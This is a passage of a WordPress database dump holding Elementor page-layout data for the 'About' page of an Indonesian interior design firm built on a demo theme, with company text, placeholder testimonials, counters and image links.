"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/05.jpg.png\",\"id\":757,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"6720e69\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":null,\"_inline_size_tablet\":33},\"elements\":[{\"id\":\"77fc613\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/06.png\",\"id\":756,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false}]'),(3618,4837,'_elementor_page_assets','a:1:{s:6:\"styles\";a:4:{i:0;s:12:\"e-animations\";i:1;s:12:\"e-animations\";i:2;s:12:\"e-animations\";i:3;s:12:\"e-animations\";}}'),(3619,4837,'_elementor_pro_version','3.8.1'),(3620,4837,'_elementor_css','a:6:{s:4:\"time\";i:1685010201;s:5:\"fonts\";a:0:{}s:5:\"icons\";a:4:{i:0;s:8:\"fa-solid\";i:3;s:3:\"all\";i:4;s:0:\"\";i:6;s:8:\"flaticon\";}s:20:\"dynamic_elements_ids\";a:0:{}s:6:\"status\";s:4:\"file\";i:0;s:0:\"\";}'),(3621,4838,'_wp_page_template','elementor_header_footer'),(3622,4838,'_elementor_edit_mode','builder'),(3623,4838,'_elementor_template_type','wp-page'),(3624,4838,'_elementor_version','3.8.1'),(3625,4838,'_elementor_data','[{\"id\":\"013ca3e\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/bg-section-1.png\",\"id\":3589,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"center right\",\"background_repeat\":\"no-repeat\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"120\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"10\",\"bottom\":\"80\",\"left\":\"10\",\"isLinked\":false},\"background_position_tablet\":\"top right\",\"background_size\":\"auto\",\"gap\":\"no\",\"margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"b6a844e\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50.684,\"_inline_size_tablet\":100,\"align\":\"flex-end\",\"align_tablet\":\"flex-start\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"100\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"ova-move-right\",\"animation_tablet\":\"none\",\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"50\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"56708b8\",\"elType\":\"widget\",\"settings\":{\"template\":\"template_2\",\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/about-get-to-know-us.jpg\",\"id\":710,\"alt\":\"\",\"source\":\"library\"},\"show_line_left\":\"yes\",\"text_left\":\"Architect\",\"text_left_margin\":{\"unit\":\"px\",\"size\":40,\"sizes\":[]},\"image_width_tablet\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"image_width_mobile\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"image_height_mobile\":{\"unit\":\"px\",\"size\":360,\"sizes\":[]},\"line_width_left_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"}],\"isInner\":false},{\"id\":\"1829eb5\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":49.316,\"_inline_size_tablet\":100,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"ova-move-left\",\"animation_tablet\":\"none\"},\"elements\":[{\"id\":\"2733af6\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"\",\"title\":\"REDESIGN LIFE\",\"align_heading\":\"left\",\"margin_title\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"13\",\"left\":\"0\",\"isLinked\":false},\"content_typography_title_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"dcb995a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Bauhaus Living adalah interior design consultant &amp; contractor yang telah berdiri sejak tahun 2005.<\\/p><p>Kami telah menangani 300+ proyek residential dan commercial di Jakarta dan sekitarnya.<\\/p><p>Misi kami adalah mengubah interior tempat tinggal maupun tempat kerja agar selain nyaman juga mewakili kepribadian penghuninya.<\\/p>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"60\",\"bottom\":\"7\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"2eb768f\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"Konsultasi perencanaan & interior design\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"ced22e0\"},{\"text\":\"Penyusunan Rencana Anggaran Belanja\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"e6ab069\"},{\"text\":\"Produksi furniture dan pekerjaan sipil\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"5d551b6\"}],\"icon_color\":\"#E3B25A\",\"icon_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"text_color\":\"#242424\",\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"icon_typography_font_weight\":\"bold\",\"space_between\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"space_between_mobile\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"icon_typography_line_height\":{\"unit\":\"em\",\"size\":1.4,\"sizes\":[]},\"icon_typography_line_height_tablet\":{\"unit\":\"em\",\"size\":1.2,\"sizes\":[]},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"icon-list\"},{\"id\":\"f3caa1a\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"structure\":\"20\"},\"elements\":[{\"id\":\"697046f\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":20},\"elements\":[{\"id\":\"4b2c591\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/avatar.jpg\",\"id\":718,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"image_border_width\":{\"unit\":\"px\",\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"_element_width\":\"auto\",\"_border_border\":\"solid\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true},\"_border_color\":\"#E3B25A\",\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"15\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":true},{\"id\":\"9b875c0\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":79.92,\"space_between_widgets\":10},\"elements\":[{\"id\":\"1150f91\",\"elType\":\"widget\",\"settings\":{\"title\":\"John Alan\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"header_size\":\"h3\",\"typography_font_weight\":\"100\",\"text_stroke_text_stroke_type\":\"yes\",\"text_stroke_text_stroke\":{\"unit\":\"px\",\"size\":3,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"23ae2ff\",\"elType\":\"widget\",\"settings\":{\"editor\":\"CO - FOUNDER\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e8e90de\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#F5F5F5\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"110\",\"right\":\"0\",\"bottom\":\"80\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"50\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5b19198\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"d460dea\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Real Testimonials\",\"title\":\"What they\\u2019re talking about BauHaus\",\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"25\",\"bottom\":\"0\",\"left\":\"25\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"margin_title\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_animation\":\"fadeInUp\",\"_animation_tablet\":\"none\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"da0b416\",\"elType\":\"widget\",\"settings\":{\"version\":\"version_1\",\"tab_item\":[{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"11f956f\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/kevin-martin.jpg\",\"id\":1415,\"alt\":\"\",\"source\":\"library\"},\"background_color_item\":\"#242424\"},{\"name_author\":\"Jessica brown \",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"d232423\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/jessica.jpg\",\"id\":1416,\"alt\":\"\",\"source\":\"library\"},\"background_color_item\":\"#E3B25A\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"8056628\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mike-hardson.jpg\",\"id\":1417,\"alt\":\"\",\"source\":\"library\"},\"background_color_item\":\"#242424\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/avatar.jpg\",\"id\":718,\"alt\":\"\",\"source\":\"library\"},\"background_color_item\":\"#242424\",\"_id\":\"51a9c88\"}],\"tab_item_v2\":[{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"9c560b9\"},{\"name_author\":\"Jessica brown \",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"63f0bcf\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"9b446cc\"}],\"tab_item_v3\":[{\"name_author\":\"Kevin martin\",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"94218cd\"},{\"name_author\":\"Jessica brown \",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"9ac0b32\"},{\"name_author\":\"Mike hardson\",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"f80af3e\"}],\"background_item_margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_margin\":{\"unit\":\"px\",\"top\":\"-15\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_animation\":\"bounceInUp\",\"_animation_tablet\":\"none\",\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"dot_control\":\"yes\",\"autoplay\":\"\"},\"elements\":[],\"widgetType\":\"retirio_elementor_testimonial\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5079813\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/bg-contact-with-us.jpg\",\"id\":2653,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"center center\",\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"background_overlay_background\":\"classic\",\"background_overlay_color\":\"#242424\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.8,\"sizes\":[]},\"padding\":{\"unit\":\"px\",\"top\":\"110\",\"right\":\"0\",\"bottom\":\"170\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"140\",\"left\":\"0\",\"isLinked\":false},\"margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"4971895\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"space_between_widgets\":30},\"elements\":[{\"id\":\"22aaaa7\",\"elType\":\"widget\",\"settings\":{\"title\":\"Challenges in deploying\\ninterior design applications\",\"align\":\"center\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"800\",\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"16\",\"bottom\":\"0\",\"left\":\"16\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"7\",\"bottom\":\"0\",\"left\":\"7\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_element_custom_width\":{\"unit\":\"%\",\"size\":80,\"sizes\":[]},\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":42,\"sizes\":[]},\"typography_line_height\":{\"unit\":\"em\",\"size\":1.2,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fe7bd92\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"\",\"library\":\"\"},\"label\":\"Get your quote or call: \",\"items_info\":[{\"type\":\"phone\",\"email_label\":\"email@company.com\",\"email_address\":\"email@company.com\",\"_id\":\"6dcb687\",\"phone_label\":\"+ 1800-111-543 \",\"phone_address\":\"1800111543\"}],\"alignment\":\"center\",\"label_color\":\"#FFFFFF\",\"label_typography_typography\":\"custom\",\"label_typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"label_typography_font_weight\":\"700\",\"label_margin\":{\"unit\":\"px\",\"top\":\"3\",\"right\":\"3\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"contact_label_display\":\"inline-flex\",\"info_typography_typography\":\"custom\",\"info_typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"info_typography_font_weight\":\"700\",\"info_color\":\"#E3B25A\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false},\"contact_label_display_mobile\":\"inline-block\",\"alignment_mobile\":\"center\",\"info_item_alignment_mobile\":\"center\"},\"elements\":[],\"widgetType\":\"retirio_elementor_contact_info\"},{\"id\":\"1dbd858\",\"elType\":\"widget\",\"settings\":{\"text\":\"Contact with us\",\"background_color\":\"#FFFFFF\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"text_padding\":{\"unit\":\"px\",\"top\":\"18\",\"right\":\"38\",\"bottom\":\"18\",\"left\":\"38\",\"isLinked\":false},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"typography_font_weight\":\"700\",\"typography_text_transform\":\"uppercase\",\"typography_line_height\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]},\"typography_line_height_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"typography_line_height_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"link\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/contact\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"center\",\"button_text_color\":\"#2D2D2D\",\"hover_color\":\"#FFFFFF\",\"button_bg_hover\":\"#E3B25A\",\"_animation\":\"none\",\"_animation_tablet\":\"none\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a9e80df\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"margin\":{\"unit\":\"px\",\"top\":\"-66\",\"right\":0,\"bottom\":\"120\",\"left\":0,\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"c5b31d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"1ecd2ea\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"structure\":\"40\",\"box_shadow_box_shadow_type\":\"yes\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":10,\"blur\":10,\"spread\":0,\"color\":\"rgba(0, 0, 0, 0.1)\"},\"padding\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"50\",\"bottom\":\"40\",\"left\":\"50\",\"isLinked\":false},\"background_background\":\"classic\",\"background_color\":\"#FFFFFF\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"-110\",\"left\":0,\"isLinked\":false},\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/bg-couter.png\",\"id\":3570,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_xpos\":{\"unit\":\"%\",\"size\":-290,\"sizes\":[]},\"background_xpos_tablet\":{\"unit\":\"%\",\"size\":120,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":53,\"sizes\":[]},\"background_ypos\":{\"unit\":\"%\",\"size\":60,\"sizes\":[]},\"background_ypos_tablet\":{\"unit\":\"%\",\"size\":60,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":71,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"background_size\":\"auto\",\"margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"30\",\"bottom\":\"40\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[{\"id\":\"617f43e\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"_inline_size_tablet\":50,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"ac2aeba\",\"elType\":\"widget\",\"settings\":{\"title\":\"Project Completed\",\"icon\":{\"value\":\"flaticon flaticon-architect-1\",\"library\":\"flaticon\"},\"number\":6800},\"elements\":[],\"widgetType\":\"retirio_elementor_counter\"}],\"isInner\":true},{\"id\":\"431e0f1\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"_inline_size_tablet\":50,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"da1e266\",\"elType\":\"widget\",\"settings\":{\"title\":\"Architectures\",\"number\":906,\"icon\":{\"value\":\"flaticon flaticon-architect\",\"library\":\"flaticon\"}},\"elements\":[],\"widgetType\":\"retirio_elementor_counter\"}],\"isInner\":true},{\"id\":\"5255259\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"_inline_size_tablet\":50,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"083da50\",\"elType\":\"widget\",\"settings\":{\"title\":\"Service providing\",\"number\":200,\"icon\":{\"value\":\"flaticon flaticon-buildings\",\"library\":\"flaticon\"}},\"elements\":[],\"widgetType\":\"retirio_elementor_counter\"}],\"isInner\":true},{\"id\":\"944a539\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"_inline_size_tablet\":50},\"elements\":[{\"id\":\"d0e2ce9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Happy customers\",\"number\":9760,\"icon\":{\"value\":\"flaticon flaticon-satisfaction\",\"library\":\"flaticon\"}},\"elements\":[],\"widgetType\":\"retirio_elementor_counter\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4388608\",\"elType\":\"section\",\"settings\":{\"padding\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"0\",\"bottom\":\"90\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"70\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"b6b9eaa\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5a2ebcc\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Our Architects\",\"title\":\"Our expert team\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"9d2f9e3\",\"elType\":\"widget\",\"settings\":{\"info_background_background\":\"classic\",\"info_background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/bg-lines-team.png\",\"id\":937,\"alt\":\"\",\"source\":\"library\"},\"info_background_position\":\"top right\",\"info_background_repeat\":\"no-repeat\",\"total_count\":6,\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"ova_team\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7836724\",\"elType\":\"section\",\"settings\":{\"structure\":\"60\",\"background_background\":\"classic\",\"background_color\":\"#F5F5F5\",\"padding\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"0\",\"bottom\":\"50\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"b90ed21\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":null,\"_inline_size_tablet\":33,\"_inline_size_mobile\":100,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"b88a577\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/01.png\",\"id\":752,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"ad43d0d\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":null,\"_inline_size_tablet\":33,\"_inline_size_mobile\":100,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"35d31c6\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/02.png\",\"id\":753,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"0eaabe3\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":null,\"_inline_size_tablet\":33,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"4c51b79\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/03.png\",\"id\":754,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"ee06889\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":null,\"_inline_size_tablet\":33,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"02c4aae\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/04.png\",\"id\":755,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"c6b5264\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":null,\"_inline_size_tablet\":33,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"c3c96cc\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/05.jpg.png\",\"id\":757,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"6720e69\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":null,\"_inline_size_tablet\":33},\"elements\":[{\"id\":\"77fc613\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/06.png\",\"id\":756,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false}]'),(3626,4838,'_elementor_page_assets','a:1:{s:6:\"styles\";a:4:{i:0;s:12:\"e-animations\";i:1;s:12:\"e-animations\";i:2;s:12:\"e-animations\";i:3;s:12:\"e-animations\";}}'),(3627,4838,'_elementor_pro_version','3.8.1'),(3628,4838,'_elementor_css','a:6:{s:4:\"time\";i:1685010201;s:5:\"fonts\";a:0:{}s:5:\"icons\";a:4:{i:0;s:8:\"fa-solid\";i:3;s:3:\"all\";i:4;s:0:\"\";i:6;s:8:\"flaticon\";}s:20:\"dynamic_elements_ids\";a:0:{}s:6:\"status\";s:4:\"file\";i:0;s:0:\"\";}'),(3629,4839,'_wp_attached_file','2023/09/john_allan.jpg'),(3630,4839,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:288;s:6:\"height\";i:286;s:4:\"file\";s:22:\